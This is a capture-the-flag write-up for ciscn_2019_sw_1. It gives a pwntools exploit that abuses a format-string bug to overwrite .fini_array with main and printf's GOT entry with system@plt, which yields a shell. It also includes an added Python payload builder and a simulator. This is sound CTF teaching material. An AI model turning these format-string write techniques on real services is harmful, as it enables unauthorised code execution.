ciscn_2019_sw_1

Approach

Use the format string to make the program loop: overwrite the __do_global_dtors_aux_fini_array_entry slot (the .fini_array entry at 0x0804979C) with the address of main. main is invoked through __libc_start_main, which runs the function pointers in .fini_array once main returns, so pointing that entry at main gets us a second pass through the vulnerable printf. In the same payload, overwrite printf's GOT entry with system@plt; on the second pass whatever we type is passed to system instead of printf, so sending /bin/sh gives a shell.
exp:

from pwn import *

# p = process('./ciscn_2019_sw_1')
p = remote('node3.buuoj.cn', 25777)
elf = ELF('./ciscn_2019_sw_1')

main = 0x08048534
fini = 0x0804979C           # __do_global_dtors_aux_fini_array_entry
printf = elf.got['printf']
system = 0x80483D0          # system@plt
system_low = system & 0xffff
system_high = system >> 16
offset = 4                  # our buffer is printf's 4th argument (found with AAAA%p%p... probing)

# payload = fmtstr_payload(offset, {fini: main}, write_size='short')
# Three %hn writes in one shot, counted from the 16-byte address block:
#   %4$hn -> fini      = 0x8534 (low half of main; the 0x0804 high half is already there,
#                                so the fini+2 slot at argument 7 is never written)
#   %5$hn -> printf    = 0x83D0 (low half of system@plt)
#   %6$hn -> printf+2  = 0x0804 (high half of system@plt)
# Each width is the distance from the running output count to the next target,
# taken modulo 0x10000 so the counter only ever moves forward.
payload = p32(fini) + p32(printf) + p32(printf + 2) + p32(fini + 2)
payload += ('%' + str((main & 0xffff) - 0x10) + 'd%4$hn'
            + '%' + str((system_low - (main & 0xffff)) & 0xffff) + 'd%5$hn'
            + '%' + str((system_high - system_low) & 0xffff) + 'd%6$hn').encode()
p.sendline(payload)
log.success('payload_length: ' + str(len(payload)))
p.interactive()   # type /bin/sh: the second main now calls system() on it
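The hand-tuned widths above work, but they make printf emit about 130 KB because the writes are ordered by address rather than by value and the counter has to wrap twice. The following is an added example, not the writeup's exploit: a small builder that takes the same three halfword writes, orders them by ascending value so every padding step is short (as pwntools' fmtstr_payload does, using %Nc so the width is exact), plus a simulator that replays printf's output counter over a payload and reports what each %hn would store. main, fini_array and system@plt are the writeup's values; PRINTF_GOT is a placeholder, since the exploit reads the real one from elf.got['printf'].

```python
import re
import struct

# Constructed constants for ciscn_2019_sw_1 (32-bit), taken from the writeup above.
MAIN = 0x08048534
FINI_ARRAY = 0x0804979C    # __do_global_dtors_aux_fini_array_entry
SYSTEM_PLT = 0x080483D0
FMT_OFFSET = 4             # our buffer is printf's 4th argument
PRINTF_GOT = 0x0804A014    # hypothetical; the real exploit uses elf.got['printf']


def build_fmt_writes(writes, offset, written=0):
    """Build a format-string payload performing each addr -> 16-bit value write.

    writes:  dict {address: value}, value in 0..0xffff, written with %hn.
    offset:  printf argument index at which our buffer starts on the stack.
    written: bytes printf already emitted before reaching our buffer.
    Writes are sorted by value so each step only pads forward; the total
    output is then at most 0xffff bytes instead of several wrap-arounds.
    """
    ordered = sorted(writes.items(), key=lambda kv: kv[1])
    addrs = b"".join(struct.pack("<I", addr) for addr, _ in ordered)
    count = written + len(addrs)          # the address block is printed too
    fmt = ""
    for i, (_, value) in enumerate(ordered):
        delta = (value - count) & 0xffff
        if delta:
            fmt += "%%%dc" % delta        # %Nc prints exactly N bytes
            count += delta
        fmt += "%%%d$hn" % (offset + i)   # store low 16 bits of the counter
    return addrs + fmt.encode()


def simulate_fmt_writes(payload, offset, n_addrs):
    """Replay printf's output counter over payload; return {address: halfword}.

    Models only what these payloads use: a leading block of n_addrs
    little-endian addresses, %Nc / %Nd padding and positional %K$hn writes.
    A %Nd width is treated as exact, which holds when N is wider than the
    number actually printed (true for every width on this page).
    """
    addrs = [struct.unpack_from("<I", payload, 4 * i)[0] for i in range(n_addrs)]
    fmt = payload[4 * n_addrs:].decode()
    count = 4 * n_addrs
    result = {}
    for m in re.finditer(r"%(\d+)[cd]|%(\d+)\$hn", fmt):
        if m.group(1) is not None:
            count += int(m.group(1))
        else:
            target = addrs[int(m.group(2)) - offset]
            result[target] = count & 0xffff
    return result


def loop_and_hijack_payload(printf_got=PRINTF_GOT, offset=FMT_OFFSET):
    """The writeup's three writes: fini_array -> main, printf@got -> system@plt."""
    writes = {
        FINI_ARRAY: MAIN & 0xffff,        # high half 0x0804 is already in place
        printf_got: SYSTEM_PLT & 0xffff,
        printf_got + 2: SYSTEM_PLT >> 16,
    }
    return build_fmt_writes(writes, offset)


if __name__ == "__main__":
    p = loop_and_hijack_payload()
    print(p, len(p))
    print({hex(a): hex(v) for a, v in simulate_fmt_writes(p, FMT_OFFSET, 3).items()})
```

For this binary the sorted payload is 45 bytes and printf emits 0x8534 bytes in total; the simulator can also be pointed at the original payload (four addresses, %d widths) to confirm that its constants land the same three halfwords.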
